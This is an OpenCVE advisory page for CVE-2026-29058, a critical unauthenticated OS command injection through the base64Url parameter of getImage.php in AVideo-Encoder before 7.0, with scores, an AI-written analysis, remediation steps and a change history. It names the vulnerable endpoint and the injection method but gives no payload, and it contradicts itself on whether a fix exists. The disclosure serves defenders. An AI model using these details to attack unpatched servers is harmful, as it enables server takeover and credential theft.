Description
AVideo is a video-sharing Platform software. Prior to version 7.0, an unauthenticated attacker can execute arbitrary OS commands on the server by injecting shell command substitution into the base64Url GET parameter. This can lead to full server compromise, data exfiltration (e.g., configuration secrets, internal keys, credentials), and service disruption. This issue has been patched in version 7.0.
Published: 2026-03-06
Score: 9.8 Critical
EPSS: 50.9% High
KEV: No
Impact: Remote Command Execution
Action: Patch Immediately
AI Analysis

Impact

The vulnerability allows an unauthenticated attacker to supply a crafted base64Url value in the GET request to objects/getImage.php. This value is decoded and interpolated into an OS command, enabling arbitrary shell command execution. The impact is severe: the attacker can obtain full server control, exfiltrate configuration data and credentials, and disrupt services. The weakness is a classic OS command injection (CWE‑78).

Affected Systems

Affected systems are installations of the AVideo‑Encoder product from WWBN, any version prior to 7.0. The product is a video‑sharing platform; the vulnerability exists in the objects/getImage.php endpoint for all pre‑7.0 releases. No specific sub‑versions are listed, so the entire pre7.0 release line is vulnerable.

Risk and Exploitability

The CVSS score of 9.8 indicates critical severity, and an EPSS percentile of 51% shows a high likelihood of exploitation in the wild. Because the issue is unauthenticated and uses a standard HTTP request, attackers only need network visibility to the target, making the attack vector broadly open. The vulnerability is not yet listed in the CISA KEV catalog, but the risk profile warrants immediate action. Exploitation requires constructing a base64Url payload that, when decoded, injects command substitution into the server; if the application does not validate or sanitize the input, the command will run with the web process’s permissions.

Generated by OpenCVE AI on April 16, 2026 at 11:27 UTC.

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Apply the official patch by upgrading to AVideo‑Encoder version 7.0 or later, which removes the vulnerable code path.
  • For any custom or legacy code modifications to objects/getImage.php, replace the base64Url handling with strict input validation or remove the endpoint entirely to eliminate re‑introduction risk.
  • Implement a temporary application firewall or reverse‑proxy rule that blocks the base64Url query parameter from reaching the application until the patch is deployed, limiting exposure while transitioning.

Generated by OpenCVE AI on April 16, 2026 at 11:27 UTC.

Tracking

Sign in to view the affected projects.

Advisories
Source ID Title
Github GHSA Github GHSA GHSA-9j26-99jh-v26q WWBN AVideo is vulnerable to unauthenticated OS Command Injection via base64Url in objects/getImage.php
History

Tue, 10 Mar 2026 19:15:00 +0000

Type Values Removed Values Added
CPEs cpe:2.3:a:wwbn:avideo-encoder:*:*:*:*:*:*:*:*

Mon, 09 Mar 2026 20:15:00 +0000

Type Values Removed Values Added
Metrics ssvc

{'options': {'Automatable': 'yes', 'Exploitation': 'none', 'Technical Impact': 'total'}, 'version': '2.0.3'}

Fri, 06 Mar 2026 15:30:00 +0000

Type Values Removed Values Added
First Time appeared Wwbn
Wwbn avideo-encoder
Vendors & Products Wwbn
Wwbn avideo-encoder

Fri, 06 Mar 2026 07:15:00 +0000

Type Values Removed Values Added
Description AVideo is a video-sharing Platform software. Prior to version 7.0, an unauthenticated attacker can execute arbitrary OS commands on the server by injecting shell command substitution into the base64Url GET parameter. This can lead to full server compromise, data exfiltration (e.g., configuration secrets, internal keys, credentials), and service disruption. This issue has been patched in version 7.0.
Title AVideo: Unauthenticated OS Command Injection via base64Url in objects/getImage.php
Weaknesses CWE-78
References
Metrics cvssV3_1

{'score': 9.8, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}

Subscriptions

Wwbn Avideo-encoder
cve-icon MITRE

Status: PUBLISHED

Assigner: GitHub_M

Published:

Updated: 2026-03-09T20:01:00.580Z

Reserved: 2026-03-03T17:50:11.244Z

Link: CVE-2026-29058

cve-icon Vulnrichment

Updated: 2026-03-09T20:00:56.305Z

cve-icon NVD

Status : Analyzed

Published: 2026-03-06T07:16:02.267

Modified: 2026-03-10T19:14:24.553

Link: CVE-2026-29058

cve-icon Redhat

No data.

cve-icon OpenCVE Enrichment

Updated: 2026-04-16T11:30:15Z

Weaknesses